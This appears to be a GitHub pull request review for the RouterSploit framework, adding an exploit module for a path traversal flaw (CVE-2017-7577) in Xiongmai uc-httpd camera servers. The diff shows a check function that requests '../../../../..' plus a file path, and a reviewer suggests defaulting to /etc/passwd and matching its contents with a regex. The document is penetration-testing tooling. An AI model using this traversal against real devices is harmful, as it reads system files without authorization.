### PR TITLE
Add new exploit modules for xiongmai

### PR DESCRIPTION
**Pull request by GH0st3rs**

### CODE REVIEW

**Comment by GH0st3rs** [comment]
Add exploit for WatchGuard XCS 9.2 based Metasploit module

**Comment by lucyoa** [comment]
That looks nice @GH0st3rs! Can you please separate these 3 exploits to 3 different pull requests, so we could analyse them individually? Thanks!

File: routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py [hunk 1]
```diff
@@ -0,0 +1,53 @@
...
+            'https://www.cvedetails.com/cve/CVE-2017-7577/'
+        ],
+        'devices': [
+            'Xiongmai Technologies app: Uc-httpd 1.0.0',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+    file = exploits.Option('', 'Target file path')
```
Comment (lucyoa) [inline routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py]: * the name of this parameter should be changed to "filename"
* default value should be "/etc/passwd"

File: routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py [hunk 2]
```diff
@@ -0,0 +1,53 @@
...
+            'https://packetstormsecurity.com/files/142131/uc-httpd-directory-traversal.txt',
+            'https://www.cvedetails.com/cve/CVE-2017-7577/'
+        ],
+        'devices': [
+            'Xiongmai Technologies app: Uc-httpd 1.0.0',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
```
Comment (lucyoa) [inline routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py]: please add validator:
`validators=validators.integer`

File: routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py [hunk 3]
```diff
@@ -0,0 +1,53 @@
...
+            print_success("Target seems to be vulnerable")
+            print_info(self.content)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        url = "{}:{}/../../../../..{}".format(self.target, self.port, self.file)
+        response = http_request(method="GET", url=url)
+        if response is not None and "404" not in response.text:
```
Comment (lucyoa) [inline routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py]: Add something more specific that should be found in the response. Downloading /etc/passwd will return content in a standard format. You can use regexp: `re.match("(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", response.text)`

```python
if response and re.match("(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", response.text):
```

**Comment by lucyoa** [comment]
Thanks! We adjusted your module to new architecture: https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/cameras/xiongmai/uc_httpd_path_traversal.py

**Pull request closed without merging**